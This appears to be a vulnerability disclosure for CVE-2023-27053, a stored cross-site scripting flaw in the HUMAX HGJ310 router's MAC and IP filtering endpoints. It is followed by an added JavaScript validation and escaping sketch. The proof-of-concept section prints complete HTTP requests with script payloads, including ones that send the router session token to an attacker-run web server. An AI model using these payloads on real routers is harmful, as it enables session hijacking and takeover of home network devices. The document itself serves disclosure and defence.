/XSS-HGJ310


CVE-2023-27053

A cross-site scripting (XSS) vulnerability in the macFiltering and portIpFiltering endpoints allows attackers to insert JavaScript code through the macAddress and ipAddress parameters. The vulnerability affects the HUMAX DO BRASIL INDÚSTRIA ELETRÔNICA LTDA Model HGJ310 (CLARO) BRGCAI 1.0.69 router.

Vendor: HUMAX Co., Ltd.
Model: HGJ310
Technology: DOCSIS 3.1
Hardware version: 1.0
Software version: BRGCAI 1.0.69

Cross Site Scripting - MAC filtering feature

Location: Configurações avançadas > Menu > Segurança > Controle de acesso > Filtragem por MAC (Advanced settings > Menu > Security > Access control > MAC filtering)

Stored XSS

Proof of concept:

POST /api/v1/service/macFiltering HTTP/1.1
Host: 192.168.0.1
User-Agent: Firefox
Accept: */*
Accept-Language: pt-BR,pt;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/json
Access-Token: xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
X-Requested-With: XMLHttpRequest
Content-Length: 60
Connection: close

{"active":true,"macAddress":"<script>alert('xss')</script>"}

When the page is accessed, the script is executed:

http://192.168.0.1/#page-security-mac-filtering


Session Hijacking

Start web server:

python3 -m http.server 80

Proof of concept:

POST /api/v1/service/macFiltering HTTP/1.1
Host: 192.168.0.1
User-Agent: Firefox
Accept: */*
Accept-Language: pt-BR,pt;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/json
Access-Token: xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
X-Requested-With: XMLHttpRequest
Content-Length: 122
Connection: close

{"active":true,"macAddress":"<script> new Image().src='http://192.168.0.72/?='+sessionStorage.getItem('token');</script>"}

When the client accesses the page, the session token is sent to the attacker:

http://192.168.0.1/#page-security-mac-filtering


[Screenshot: Python 3 web server receiving the session token]

Cross Site Scripting - IP filtering feature

Location: Configurações avançadas > Menu > Segurança > Controle de acesso > Filtragem por IP (Advanced settings > Menu > Security > Access control > IP filtering)

Stored XSS

Proof of concept:

POST /api/v1/service/portIpFiltering HTTP/1.1
Host: 192.168.0.1
User-Agent: Firefox
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/json
Access-Token: xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
X-Requested-With: XMLHttpRequest
Content-Length: 77
Connection: close

{"ipAddress":"<script>alert('xss')</script>","active":true,"protocol":"both"}

When the page is accessed, the script is executed:

http://192.168.0.1/#page-security-ip-filtering


Session Hijacking

Start web server:

python3 -m http.server 80

Proof of concept:

POST /api/v1/service/portIpFiltering HTTP/1.1
Host: 192.168.0.1
User-Agent: Firefox
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/json
Access-Token: xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
X-Requested-With: XMLHttpRequest
Content-Length: 139
Connection: close

{"ipAddress":"<script> new Image().src='http://192.168.0.72/?='+sessionStorage.getItem('token');</script>","active":true,"protocol":"both"}

When the client accesses the page, the session token is sent to the attacker:

http://192.168.0.1/#page-security-ip-filtering


[Screenshot: Python 3 web server receiving the session token]
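
Mitigation sketch for both endpoints above, added here as an example and not taken from the advisory or from the HUMAX firmware: reject any macAddress or ipAddress value that is not a well-formed address before it is stored, and HTML-encode stored values when the filtering pages render them. The function names, the IPv4-only check and the protocol values other than "both" are assumptions.

```javascript
// Allow-list validation and output encoding for the two rule types in the
// proof-of-concept requests. Added example, not the router's firmware code.
const MAC_RE = /^[0-9A-Fa-f]{2}([:-])[0-9A-Fa-f]{2}(?:\1[0-9A-Fa-f]{2}){4}$/;
const PROTOCOLS = new Set(["tcp", "udp", "both"]); // assumption: only "both" appears on the page

function isIPv4(value) {
  if (typeof value !== "string") return false;
  const parts = value.split(".");
  // Each octet: 1-3 digits, no leading zeros, value 0..255.
  return parts.length === 4 && parts.every((p) => /^(0|[1-9]\d{0,2})$/.test(p) && Number(p) <= 255);
}

function isMac(value) {
  return typeof value === "string" && MAC_RE.test(value);
}

// Returns a list of problems; an empty list means the rule may be stored.
function validateRule(kind, body) {
  if (body === null || typeof body !== "object") return ["body must be a JSON object"];
  const errors = [];
  if (typeof body.active !== "boolean") errors.push("active must be boolean");
  if (kind === "macFiltering") {
    if (!isMac(body.macAddress)) errors.push("macAddress is not a MAC address");
  } else if (kind === "portIpFiltering") {
    if (!isIPv4(body.ipAddress)) errors.push("ipAddress is not an IPv4 address");
    if (!PROTOCOLS.has(body.protocol)) errors.push("protocol not allowed");
  } else {
    errors.push("unknown rule kind");
  }
  return errors;
}

// Second layer: encode stored values before they reach HTML, so entries
// saved before validation existed are displayed as text instead of markup.
function escapeHtml(value) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(value).replace(/[&<>"']/g, (c) => map[c]);
}

// Constructed sample: one legitimate rule and the alert payload from the PoC.
const samples = [
  { active: true, macAddress: "00:11:22:33:44:55" },
  { active: true, macAddress: "<script>alert('xss')</script>" },
];
const accepted = samples.map((s) => validateRule("macFiltering", s).length === 0);
console.log(accepted); // [ true, false ]
```

Running `validateRule` over rules already saved on a device also flags entries that were stored before the check existed.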